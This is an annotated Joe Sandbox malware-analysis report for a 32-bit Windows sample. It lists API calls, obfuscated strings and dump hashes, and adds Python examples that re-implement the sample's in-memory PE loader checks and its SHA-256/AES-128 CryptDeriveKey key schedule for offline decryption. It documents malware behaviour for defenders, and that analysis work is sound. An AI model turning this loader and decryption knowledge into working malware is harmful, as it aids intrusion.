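                      The strings referenced at 00402F08 through 00403062 are the diagnostics of an in-memory PE loader: each message names one header check that a hand-rolled image mapper performs before it reserves memory for the image (the messages are the same ones used by the open-source MemoryModule library; that identification is made here, the report itself does not name the library). The Python below is an added example written for this page, not code recovered from the sample or produced by Joe Sandbox. It applies the same sequence of checks, in the same order and with the same messages, to a constructed one-section PE32 skeleton. It assumes HOST_MACHINE is IMAGE_FILE_MACHINE_I386 (the sample is 32-bit) and a 0x1000 page size for the AlignValueUp comparison; the constant names and the helper names are the example's own.

```python
"""Re-implementation of the header checks behind the loader diagnostics listed above
(example code for this page; not the sample's code)."""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D        # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550     # "PE\0\0"
IMAGE_FILE_MACHINE_I386 = 0x014C    # assumed HOST_MACHINE for this 32-bit sample
SIZEOF_DOS_HEADER = 64
SIZEOF_NT_HEADERS32 = 4 + 20 + 224  # Signature + IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32
SIZEOF_SECTION_HEADER = 40
PAGE_SIZE = 0x1000                  # assumed dwPageSize (GetNativeSystemInfo on x86)


def align_value_up(value, alignment):
    """Round value up to the next multiple of a power-of-two alignment."""
    return (value + alignment - 1) & ~(alignment - 1)


class PeLoadError(ValueError):
    """Carries the same message the loader emits through its debug-output path."""


def validate_pe_image(data, host_machine=IMAGE_FILE_MACHINE_I386, page_size=PAGE_SIZE):
    """Apply the loader's header checks in order; return the page-aligned image size."""
    size = len(data)
    if size < SIZEOF_DOS_HEADER:
        raise PeLoadError("Size is not valid!")
    if struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise PeLoadError("DOS header is not valid!")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if size < e_lfanew + SIZEOF_NT_HEADERS32:
        raise PeLoadError("DOS header size is not valid!")
    if struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise PeLoadError("Signature != IMAGE_NT_SIGNATURE!")
    machine, num_sections, _, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)                   # IMAGE_FILE_HEADER
    if machine != host_machine:
        raise PeLoadError("FileHeader.Machine != HOST_MACHINE!")
    opt = e_lfanew + 24                                   # IMAGE_OPTIONAL_HEADER32
    section_alignment = struct.unpack_from("<I", data, opt + 32)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    if section_alignment & 1:
        raise PeLoadError("Section alignment invalid!")
    # Find where the highest section ends in memory. A section with no raw
    # data (e.g. .bss) still reserves one SectionAlignment unit.
    last_section_end = 0
    table = opt + opt_size
    for i in range(num_sections):
        hdr = table + i * SIZEOF_SECTION_HEADER
        if hdr + SIZEOF_SECTION_HEADER > size:           # bounds guard added here, not in the sample
            raise PeLoadError("Size is not valid!")
        virtual_address, raw_size = struct.unpack_from("<II", data, hdr + 12)
        last_section_end = max(last_section_end,
                               virtual_address + (raw_size or section_alignment))
    aligned_image_size = align_value_up(size_of_image, page_size)
    if aligned_image_size != align_value_up(last_section_end, page_size):
        raise PeLoadError("alignedImageSize != AlignValueUp!")
    return aligned_image_size


def loader_error_message(data):
    """Return the diagnostic the loader would log, or None if every check passes."""
    try:
        validate_pe_image(data)
    except PeLoadError as exc:
        return str(exc)
    return None


def build_minimal_pe(machine=IMAGE_FILE_MACHINE_I386, section_alignment=0x1000,
                     size_of_image=0x2000, raw_size=0x200):
    """Constructed input: a one-section PE32 skeleton carrying only the fields the
    checks read (not a runnable executable and not data taken from the sample)."""
    e_lfanew = SIZEOF_DOS_HEADER
    dos = struct.pack("<H", IMAGE_DOS_SIGNATURE).ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    file_header = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 224, 0x0102)
    optional = bytearray(224)
    struct.pack_into("<H", optional, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", optional, 32, section_alignment)
    struct.pack_into("<I", optional, 36, 0x200)           # FileAlignment
    struct.pack_into("<I", optional, 56, size_of_image)
    struct.pack_into("<I", optional, 60, 0x200)           # SizeOfHeaders
    section = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", 0x100, 0x1000, raw_size, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + struct.pack("<I", IMAGE_NT_SIGNATURE) + file_header + bytes(optional) + section
    return headers.ljust(0x200 + raw_size, b"\0")
```

                      The two SetLastError values in the listing line up with the first two failures: 0xD (ERROR_INVALID_DATA) at 00402F02 for the size check and 0xC1 (ERROR_BAD_EXE_FORMAT) at 00402F44 for the MZ check. Note that the image being validated here is whatever buffer the sample hands to this function; the 04950000 dump carries functions whose Opcode IDs are identical to those in the 00400000 image (for example 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8 appears in both), which is consistent with this loader having re-mapped a copy of the image at that address.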
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,DE4EB787), ref: 00403650
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                      • GetLastError.KERNEL32 ref: 004036E8
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                      • GetLastError.KERNEL32 ref: 0040371A
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                      • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                      • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049538B7
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049538DB
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04953945
                      • GetLastError.KERNEL32 ref: 0495394F
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04953977
                      • GetLastError.KERNEL32 ref: 04953981
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04953991
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04953A53
                      • CryptDestroyKey.ADVAPI32(?), ref: 04953AC5
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04953893
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction ID: 59e7dc52144a8d82591a686373c6de8e293fa5690d896e85b7fa2fa1b2dd26a3
                      • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction Fuzzy Hash: FD816171A002189FEB24DF24CC45B9ABBB5EF45340F1481B9E94DE72A1DB31AE858F51
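                      The two CryptoAPI functions above (the original at 00403650 and its copy at 049538B7) use the same constants: CryptAcquireContextW with provider type 0x18 (PROV_RSA_AES) and flags 0xF0000000 (CRYPT_VERIFYCONTEXT, no persistent key container), CryptCreateHash with ALG_ID 0x800C (CALG_SHA_256), and CryptDeriveKey with ALG_ID 0x660E (CALG_AES_128, a 16-byte key). What CryptDeriveKey does with the hash object is fully determined by those two ALG_IDs, so an analyst can reproduce the key offline once the data fed to CryptHashData is known. The Python below is an added example written for this page, not the sample's code and not a Windows API wrapper; it implements the CryptDeriveKey key schedule for the AES/SHA-2/MD5/SHA-1 combinations, including the documented 0x36/0x5C expansion used when a legacy digest is shorter than the requested key, and a wrapper for the exact combination this sample uses. The sample's actual hashed data is not visible in the listing, so the inputs in the test are constructed.

```python
"""Offline reproduction of the CryptDeriveKey key schedule behind the
CryptCreateHash(CALG_SHA_256) / CryptDeriveKey(CALG_AES_128) calls listed above
(example code for this page; not the sample's code)."""
import hashlib

# ALG_ID values (the two used by the sample plus related ones for comparison)
CALG_MD5, CALG_SHA1 = 0x8003, 0x8004
CALG_SHA_256, CALG_SHA_384, CALG_SHA_512 = 0x800C, 0x800D, 0x800E
CALG_AES_128, CALG_AES_192, CALG_AES_256 = 0x660E, 0x660F, 0x6610

HASH_NAMES = {CALG_MD5: "md5", CALG_SHA1: "sha1", CALG_SHA_256: "sha256",
              CALG_SHA_384: "sha384", CALG_SHA_512: "sha512"}
KEY_LENGTHS = {CALG_AES_128: 16, CALG_AES_192: 24, CALG_AES_256: 32}
SHA2_FAMILY = {CALG_SHA_256, CALG_SHA_384, CALG_SHA_512}


def crypt_derive_key(hash_alg, base_data, key_alg):
    """Return the raw key bytes CryptDeriveKey(hProv, key_alg, hHash, 0, &hKey)
    produces for a hash object of type hash_alg fed base_data via CryptHashData."""
    hash_name = HASH_NAMES[hash_alg]
    hash_value = hashlib.new(hash_name, base_data).digest()
    key_len = KEY_LENGTHS[key_alg]
    if key_len <= len(hash_value):
        # Common case, and the one this sample uses: the key is a prefix of the digest.
        return hash_value[:key_len]
    if hash_alg in SHA2_FAMILY:
        # Per the CryptDeriveKey documentation there is no expansion step for
        # SHA-2 digests; the call fails instead of stretching the hash.
        raise ValueError("CryptDeriveKey fails: SHA-2 digest shorter than requested key")
    # Legacy expansion for MD5/SHA-1 digests shorter than the key: XOR the digest
    # into 64-byte 0x36 and 0x5C pads, hash each pad, concatenate, truncate.
    inner = bytes(b ^ 0x36 for b in hash_value) + b"\x36" * (64 - len(hash_value))
    outer = bytes(b ^ 0x5C for b in hash_value) + b"\x5C" * (64 - len(hash_value))
    expanded = (hashlib.new(hash_name, inner).digest()
                + hashlib.new(hash_name, outer).digest())
    return expanded[:key_len]


def sample_key_schedule(hashed_data):
    """The exact combination at 00403674/00403710 and 049538DB/04953977:
    SHA-256 over the data passed to CryptHashData, 128-bit AES key = first 16 digest bytes."""
    return crypt_derive_key(CALG_SHA_256, hashed_data, CALG_AES_128)


def expansion_pad_digest(hash_alg, base_data, pad_byte):
    """Expose one half of the legacy expansion so callers can check it independently."""
    hash_name = HASH_NAMES[hash_alg]
    hash_value = hashlib.new(hash_name, base_data).digest()
    pad = bytes(b ^ pad_byte for b in hash_value) + bytes([pad_byte]) * (64 - len(hash_value))
    return hashlib.new(hash_name, pad).digest()
```

                      Two caveats when using the derived key to decrypt what CryptDecrypt (004037EC / 04953A53) processes: the data hashed by CryptHashData (004036DE / 04953945) is read from a buffer the listing does not show, so it has to be recovered from a memory dump or a breakpoint on that call; and an AES key created by CryptDeriveKey is used by CryptDecrypt in its default CBC mode with an all-zero IV and PKCS#5 padding unless the code sets KP_MODE or KP_IV with CryptSetKeyParam, which does not appear among the APIs listed for this function.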
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                      • LocalFree.KERNEL32(00000000), ref: 00402B62
                      • LocalFree.KERNEL32(?), ref: 00402B67
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                      • String ID: %s: %s$Error protecting memory page
                      • API String ID: 839691724-1484484497
                      • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                      • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 1wW$=K$F.~x$GOk$^uy}$^uy}$f|m$rXzo$xpw$Hn
                      • API String ID: 0-2994985386
                      • Opcode ID: 9536ff731ea9a04099f2dd48c471229258bacb373077cac6a78d91f4ed9e5a36
                      • Instruction ID: 062d67c6daadd2c4b03f25f293af44ec155b667b491b874c1d6b5da2920f4241
                      • Opcode Fuzzy Hash: 9536ff731ea9a04099f2dd48c471229258bacb373077cac6a78d91f4ed9e5a36
                      • Instruction Fuzzy Hash: 22B228F3A082049FE3046E2DEC8567AFBE9EF94720F16493DEAC5C7744EA3558058687
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: S}{$r^$')w|$5f[]$8_F^$<_F^$iqC=$qG}|$x[o{$$P~
                      • API String ID: 0-227172594
                      • Opcode ID: 3fab1447a8a84ce9430b4d46f666382212a35e3ead55a7286f6c86f5684378c0
                      • Instruction ID: 9b8d51feb1ff1aa3f6e6f41a3b172282b6e78972ab23d24481be7c4c58da4220
                      • Opcode Fuzzy Hash: 3fab1447a8a84ce9430b4d46f666382212a35e3ead55a7286f6c86f5684378c0
                      • Instruction Fuzzy Hash: 79B2E7F3A0C2009FE704AE2DEC8567ABBE9EF94720F16493DEAC5C7344E63558058697
                      APIs
                        • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                        • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04955344
                      • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                      • __Init_thread_footer.LIBCMT ref: 04955652
                      • Sleep.KERNEL32(000007D0), ref: 049559BC
                      • Sleep.KERNEL32(000007D0), ref: 049559D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: @BAO$updateSW
                      • API String ID: 3554146954-956047173
                      • Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                      • Instruction ID: cb50f06d884e9880f0ef62a95241579db65518dc8b806f430c65bdc54610dab4
                      • Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                      • Instruction Fuzzy Hash: 953213B0D00254DBEB28DF24CC987ADBBB4AF40314F6542F9D8096B2A6D775AE84CF45
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: /Cg$2[]O$2[]O$2<$;)@~$Ic?}$Mko$_Dr"$f'3|
                      • API String ID: 0-1842464399
                      • Opcode ID: e925d0338d98689c8b508e89348f9094c2afe70e491aee9ebdf2f12af06bd759
                      • Instruction ID: d1e83d054da02439293658cdb3155459ee3a57bd54aeebd64df5af04d572222d
                      • Opcode Fuzzy Hash: e925d0338d98689c8b508e89348f9094c2afe70e491aee9ebdf2f12af06bd759
                      • Instruction Fuzzy Hash: 6DB2F5F350C2049FE304AE2DED8567ABBE5EF94720F16892DEAC4C3744EA3598058797
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                      • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: &[N1$.A~$FX?$P~Mv$rz_1$zw
                      • API String ID: 0-2478748842
                      • Opcode ID: c43e54eb0469b9b51096376daf091ac622c15f6058b4d0338b0005be8e219bfc
                      • Instruction ID: 419078c01fd8c55a386fe1ace3515ab26d7b54b243cb8d90defc19801e807051
                      • Opcode Fuzzy Hash: c43e54eb0469b9b51096376daf091ac622c15f6058b4d0338b0005be8e219bfc
                      • Instruction Fuzzy Hash: 4AB2E5F3A0C6009FE304AE2DEC81A7ABBE5EB94720F1A493DE6C5C7744E63558058697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4"C$pm{${c;_$'{{$0jt$?~
                      • API String ID: 0-945698808
                      • Opcode ID: 64076b6cc7e2687d166f93dd237e4702b04a60768a1000f8413e463ba1c33cda
                      • Instruction ID: 4c985715788b00c74ebc65ba9d70590b62aee7d5a5c866de70c66dbbca8a20e0
                      • Opcode Fuzzy Hash: 64076b6cc7e2687d166f93dd237e4702b04a60768a1000f8413e463ba1c33cda
                      • Instruction Fuzzy Hash: 9FB207F3A0C304AFE3046E6DEC8566ABBE9EF94760F16893DE6C4C3744E63558018796
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID: text
                      • API String ID: 3197321146-999008199
                      • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                      • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: &A}~$&n>'$]}?$_2D$r2}
                      • API String ID: 0-705243956
                      • Opcode ID: acd1c4dba2877de175480c78103f39f31a15e31189ed6ab7af221e04c49217c6
                      • Instruction ID: 4729e4da47fad8b733fbbe98e1e61a9f66f0360683a102618567bf6101ecdc06
                      • Opcode Fuzzy Hash: acd1c4dba2877de175480c78103f39f31a15e31189ed6ab7af221e04c49217c6
                      • Instruction Fuzzy Hash: 14B218F3A0C2109FE7046E2DEC8567ABBE9EF94320F1A853DE6C4C3744EA7558058796
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: :Ck_$@J!$jH>,$}\=J
                      • API String ID: 0-772269620
                      • Opcode ID: 3a6b6527666235d5e2f92712d7e33cb7cdb07ebcbe488c1d4df61db4ea0e96ac
                      • Instruction ID: 2b736a71cea5c5cbce4012d0149ee288020d3c6f459114558c9e003159f6e61f
                      • Opcode Fuzzy Hash: 3a6b6527666235d5e2f92712d7e33cb7cdb07ebcbe488c1d4df61db4ea0e96ac
                      • Instruction Fuzzy Hash: B2B205F3A0C2049FE304AE29EC8567AFBE5EF94320F1A493DEAC5C3744E67558058697
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 5870f6e88b346de3dd458830fb0bab3246a4d891899ac372411a492dd1262dbd
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: B9022D71E012199FDF14CFA8D9D0AAEBBB5FF48314F248269D91AEB340D731A941CB90
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                      • IsDebuggerPresent.KERNEL32 ref: 0040A662
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0495A7FD
                      • IsDebuggerPresent.KERNEL32 ref: 0495A8C9
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0495A8E9
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0495A8F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: d80dbb66706cfd000b64b7993774e351344232ebf29181e0be46c47f672497d0
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: 9931E975D0521DDBDB10DFA4D9497CCBBB8BF08304F2041AAE509A7250EB715A858F49
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: '\W$BQ~$p?>
                      • API String ID: 0-2806615756
                      • Opcode ID: 9a04ec2e8aee34fa25611c93605be2cd04c4918197c97e7c53e1ac7337ccd326
                      • Instruction ID: ce038d9a5cb158548af9180a241f90689f7f3727b097af05672f8eb4e1823d55
                      • Opcode Fuzzy Hash: 9a04ec2e8aee34fa25611c93605be2cd04c4918197c97e7c53e1ac7337ccd326
                      • Instruction Fuzzy Hash: 45B248F3A0C2049FD3046F2DEC8567ABBE5EF94620F1A493DEAC5C3744EA3558058697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2S_~$@@^$tUwY
                      • API String ID: 0-846384618
                      • Opcode ID: 527fd7aedf552d8a4aeb4e213bdf300f46b7e6da4a71060e5aa47a325255abd3
                      • Instruction ID: 5a4f6d1acf07c5187f46527a0287ac1ed5ed178bc8db2788687a921325405047
                      • Opcode Fuzzy Hash: 527fd7aedf552d8a4aeb4e213bdf300f46b7e6da4a71060e5aa47a325255abd3
                      • Instruction Fuzzy Hash: D9827AF3A0C2049FE304AE2DEC8567AB7D9EF94320F1A463DEAC4C7744E97598058697
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
